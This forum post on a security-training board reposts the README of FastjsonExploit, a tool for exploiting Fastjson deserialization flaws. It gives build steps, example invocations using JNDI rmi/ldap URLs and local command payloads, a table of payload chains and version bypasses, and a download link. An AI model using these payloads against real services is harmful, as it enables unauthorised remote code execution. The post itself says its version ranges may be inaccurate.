设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
暗月安全培训论坛»论坛 安全板块 安全软件 FastjonExploit | Fastjson漏洞快速利用框架
返回列表 发新帖
查看: 203|回复: 0

FastjonExploit | Fastjson漏洞快速利用框架

[复制链接]
月师傅

91

主题

0

回帖

371

积分

管理员

积分
371
发表于 2025-5-24 11:00:25 | 显示全部楼层 |阅读模式
FastjonExploit | Fastjson漏洞快速利用框架
0x01 Introduce
FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:

一键生成利用payload,并启动所有利用环境。
管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)
0x02 Buiding

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

0x03 Usage

  2. <div>.---- -. -. .  .   .
  3.    ( .',----- - - ' '
  4.     \_/      ;--:-\         __--------------------__
  5.    __U__n_^_''__[. |ooo___  | |_!_||_!_||_!_||_!_| |
  6. c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |
  7. ,_\___________'_|,L______],|______________________|
  8. /;_(@)(@)==(@)(@)   (o)(o)      (o)^(o)--(o)^(o)

  10. FastjsonExploit is a Fastjson library vulnerability exploit framework
  11.                 Author:c0ny1<root@gv7.me>


  14. Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
  15. Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
  16. Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
  17. Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
  18. Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"

  20. Available payload types:
  21.     Payload                PayloadType VulVersion      Dependencies                                      
  22.     -------                ----------- ----------      ------------                                      
  23.     BasicDataSource1       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
  24.     BasicDataSource2       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
  25.     JdbcRowSetImpl1        jndi        1.2.2.1-1.2.2.4                                                   
  26.     JdbcRowSetImpl2        jndi        1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass                           
  27.     JdbcRowSetImpl3        jndi        1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass                           
  28.     JdbcRowSetImpl4        jndi        1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass                           
  29.     JdbcRowSetImpl5        jndi        1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass                           
  30.     JndiDataSourceFactory1 jndi        1.2.2.1-1.2.2.4 ibatis-core:3.0                                   
  31.     SimpleJndiBeanFactory1 jndi        1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE                     
  32.     TemplatesImpl1         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)   
  33.     TemplatesImpl2         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)  </div>
复制代码


0x04 Notice
帮助信息所说明的payload可利用的Fastjson版本,不一定正确。后续测试更正!
0x05 Reference
https://github.com/frohoff/ysoserial
https://github.com/mbechler/marshalsec
https://github.com/kxcode/JNDI-Exploit-Bypass-Demo



下载地址  https://github.com/c0ny1/FastjsonExploit

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|暗月安全培训论坛

GMT+8, 2026-1-10 04:38 , Processed in 0.067287 second(s), 20 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表